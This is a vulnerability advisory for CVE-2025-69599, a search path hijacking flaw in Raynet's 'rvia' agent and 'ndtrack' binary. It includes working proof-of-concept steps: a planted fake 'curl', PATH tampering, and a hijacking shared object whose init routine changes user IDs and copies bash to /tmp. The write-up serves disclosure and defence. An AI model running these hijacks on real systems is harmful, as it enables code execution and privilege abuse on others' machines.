# CVE-2025-69599

- **author:** Rafael José Núñez Gulías
- **company:** Iberian Var Group

 `rvia` in Raynet version 12.6.4392.49-amd64.deb (previous versions are probably affected but not confirmed) is vulnerable to an **Uncontrolled Search Path Element** issue. When loading shared objects and calling system binaries (such as .so, and helper binaries), they are called using relative paths, which allows a user to tamper with the final binary or .so object executed through PATH environmental variable manipulation.

![20251117223200.png](img/20251117223200.png)

In the following evidence, an arbitrary binary called `curl` is created in the `/tmp` directory.
```c
#include <stdio.h>
#include <stdlib.h>

int main() {
	system("whoami");
	return 0;
}
```

```bash
gcc curl.c -o curl # Compiling the binary
```
The PATH variable is changed so the first directory to search for the `curl` command when called by `rvia` is `/tmp`.
```bash
export PATH=/tmp:$PATH
```
And after that a call to `/opt/rvia/rvia getconfig` will use our tampered `curl` binary.

![20251209121335.png](img/20251209121335.png)

The same applies to the `upload` option.

![20251209121709.png](img/20251209121709.png)


The same problem is found when using the option `rvia inventory` which under the hood calls the binary `ndtrack`. The binary `ndtrack` calls the `cat`, and `sh` commands using a relative path.

![20251117223833.png](img/20251117223833.png)


![20251224134109.png](img/20251224134109.png)

Finally, it was detected also that the `ndtrack` binary is including shared objects `.so files`, using relative paths.

![20251118093146.png](img/20251118093146.png)

In the following evidence it is possible to see the steps taken to replace the relative call to libnetselector.so (it is possible also to perform the same actions with libuploader.so). In this case a custom shared object is created, when this shared object is executed a copy of the bash in `/tmp` directory as `bash_so_hijack` is going to be created.

The following is the C code for creating the custom shared object called libnetselector.so
```c
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>

void _init() {
	setuid(1001);
	setgid(1001);
	system("cp /bin/bash /tmp/bash_so_hijack");
}
```

```bash
gcc -fPIC -shared -o libnetselector.so libnetselector.c -nostartfiles # compiling the shared object
```

![20251209131403.png](img/20251209131403.png)

**It is important to note that, this only works when calling `ndtrack` directly, since when the `inventory` option is invoked, a call to a bash script at `/opt/rvia` called `ndtrack` is made, which sets the PATH environmental variable before calling the `ndtrack` binary.**

![20251223190146.png](img/20251223190146.png)
